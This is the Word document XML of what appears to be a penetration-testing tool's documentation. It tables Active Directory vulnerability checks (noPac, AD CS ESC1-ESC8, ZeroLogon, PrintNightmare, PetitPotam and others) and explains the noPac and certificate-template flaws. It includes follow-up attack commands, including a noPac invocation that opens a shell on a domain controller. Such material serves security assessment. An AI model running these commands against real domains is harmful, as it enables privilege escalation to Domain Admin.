            <w:tcW w:w="1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75E534E3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Aggressive?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6179EF02" w14:textId="77777777">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68F2384" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nopac.py</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C52294A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2021-42278/42287</w:t>
            </w:r>
          </w:p>
        </w:tc>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706C769" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LDAP — MachineAccountQuota + schema version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A1CE495" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7641C844" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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DD3197D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>adcs.py</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6858A41" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESC1, ESC2, ESC3, ESC4, ESC8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C15C226" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LDAP — certificate template attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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9C5D9D0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5D0D8B00" w14:textId="77777777">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4ACD263" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ms14_068.py</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50FF935" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2014-6324 (PAC Forgery)</w:t>
            </w:r>
          </w:p>
        </w:tc>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0D8268B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LDAP — domain functional level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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F4B767E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7C205460" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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6B9A66EC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>zerologon.py</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D6B6977" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2020-1472</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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CB9CC47" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Netlogon RPC probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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EDE95A9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="088861C7" w14:textId="77777777">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F51DADC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>printnightmare.py</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2463106" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2021-1675 / CVE-2021-34527</w:t>
            </w:r>
          </w:p>
        </w:tc>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9D35379" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RPC bind to \pipe\spoolss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B362DD1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="507794EE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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731BC144" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>petitpotam.py</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AD253D4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2021-36942</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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1E6A4E3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RPC bind to LSARPC / EFSRPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8506D22" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000003D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gpp_passwords.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000003E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MS14-025 (GPP Passwords)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000003F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP — groupPolicyContainer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000040"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10000041" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bronze_bit.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000042" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2020-17049 (Bronze Bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000043" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP — constrained delegation + DFL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000044"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10000045" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>certifried.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000001F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-26923 (Certifried)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000020" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP — AD CS enrollment + MAQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000021"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20000022" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ldap_signing.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000023" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP Signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000024" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection port analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000046" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="169957AA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4C923" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc224561309"/>
      <w:r>
        <w:t>5.1  noPac — CVE-2021-42278 / CVE-2021-42287</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="7F64F5EA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Checks whether the domain is vulnerable to sAMAccountName spoofing. The attack requires two conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B06AB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ms-DS-MachineAccountQuota is greater than 0 (any domain user can create machine accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BC747" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The domain has not applied KB5008380 / KB5008102 (November 2021 patches)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598E3FC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection is entirely passive — the tool reads two LDAP attributes and compares the domain schema version against the patched baseline (version 88 or higher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EF152" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>If vulnerable, any low-privileged domain user can rename a machine account to match a DC name, request a TGT, rename it back, and obtain a service ticket with Domain Admin privileges embedded in the PAC.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783C10C5"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C2CA82A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Next step if vulnerable:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="790E0FD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35C5AA4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B823872" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC2DC7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc224561310"/>
      <w:r>
        <w:t>5.2  AD CS Misconfigurations — ESC1 through ESC8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="77350641" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Active Directory Certificate Services misconfigurations are one of the highest-value findings in modern engagements. The AD CS module performs a passive LDAP audit of all certificate templates and certificate authorities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483DD915"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07BE4" w14:paraId="7EA135E1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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07BDE302" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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1ABA782E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2F363BB1"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99CE949" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESC1</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3AE4266" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Template has ENROLLEE_SUPPLIES_SUBJECT flag enabled AND a Client Authentication or Smart Card Logon </w:t>
              <w:lastRenderedPageBreak/>
              <w:t>EKU. Any enrollee can request a certificate for any user, including Domain Admins, by supplying a custom Subject Alternative Name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="61127768"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4E9CB9B6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ESC2</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6D8D4EBC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Template has the Any Purpose EKU (OID 2.5.29.37.0) or no EKU restrictions at all. The resulting certificate can be used for any purpose including authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4725D3FB"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C7BCD64" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESC3</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4832B6D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Template has the Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1) with no issuance policy requirement. Allows enrolling certificates on behalf of other users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1D90F2CB"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114226CB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESC4</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31D6EEB9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Template ACLs grant write access to low-privileged accounts, allowing an attacker to modify the template to introduce ESC1 or ESC2 conditions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6A6EBC9C"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CBF2971" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESC8</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CA5A9C5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual check item — flags each CA for verification of the EDITF_ATTRIBUTESUBJECTALTNAME2 flag and EPA configuration on HTTP enrollment endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3546A8E7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA85E6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>For a full AD CS audit with exploitation paths, certipy is the recommended follow-up tool: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6571013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E7FBC8B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>certipy find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10 -vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
